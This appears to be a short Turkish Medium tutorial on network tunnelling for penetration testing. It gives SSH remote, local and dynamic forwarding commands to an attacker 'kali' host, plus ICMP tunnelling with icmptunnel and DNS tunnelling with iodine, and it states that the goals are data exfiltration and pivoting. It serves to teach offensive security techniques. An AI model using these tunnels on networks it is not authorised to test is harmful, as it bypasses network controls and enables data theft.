Enine Boyuna Tünelleme

İçerik:
- Tünelleme nedir, nerede kullanılır.
- SSH Tünelleme
- RDP Tünelleme
- ICMP Tünelleme
- DNS Tünelleme

Amaç:
- Dışarıya veri çıkarmak (Data Exfiltration)
- İç ağda farklı network segmentine erişim sağlamak (Pivoting)

SSH bağlantısı
HTTP bağlantısı
SSH içerisinden geçen HTTP bağlantısı
ssh -R 8080:localhost:80 kali:192.168.1.101

Anlamı:
192.168.1.101 ssh sunucusuna bağlantı sağla, ve bu bağlantı sağladığımız sunucuda 8080 portuna gelen bağlantıları benim (127.0.0.1) 80 portuma yönlendir.

ssh -R 2222:localhost:22 kali@uzaksunucuip
Uzak Port Yönlendirme ile SSH Bağlantı Örneği
ssh -R 2222:localhost:3389 kali@uzaksunucuip
ssh -D 8080 kali@192.168.1.101

Anlamı:
192.168.1.101 ssh sunucusuna bağlantı sağla, kendi 8080 portumu proxy olarak tanımla ve bu proxy bağlantılarımı bağlandığım ssh sunucu üzerinden gerçekleştir.

Dinamik Yönlendirme ile Proxy oluşturmak
ssh -L 8080:ubuntu.com:80 kali:192.168.1.101

Anlamı:
Ben ssh yapan client olarak, local 8080 portuma gelen bağlantıları, (127.0.0.1:8080), ssh bağlantısı kurduğum makina üzerinden ubuntu.com:80 adresine yönlendir.

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
icmptunnel aracı ile tünelleme ve ssh bağlantısı kurmak
ICMP tünel içerisinden nc bağlantısı
iodined -fP parolamiz 172.16.0.1 tunnel.mydomain.com
iodine -fP parolamiz uzaksunucuip tunnel.mydomain.com
DNS tünelleme içerisinden ssh bağlantısı oluşturmak

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store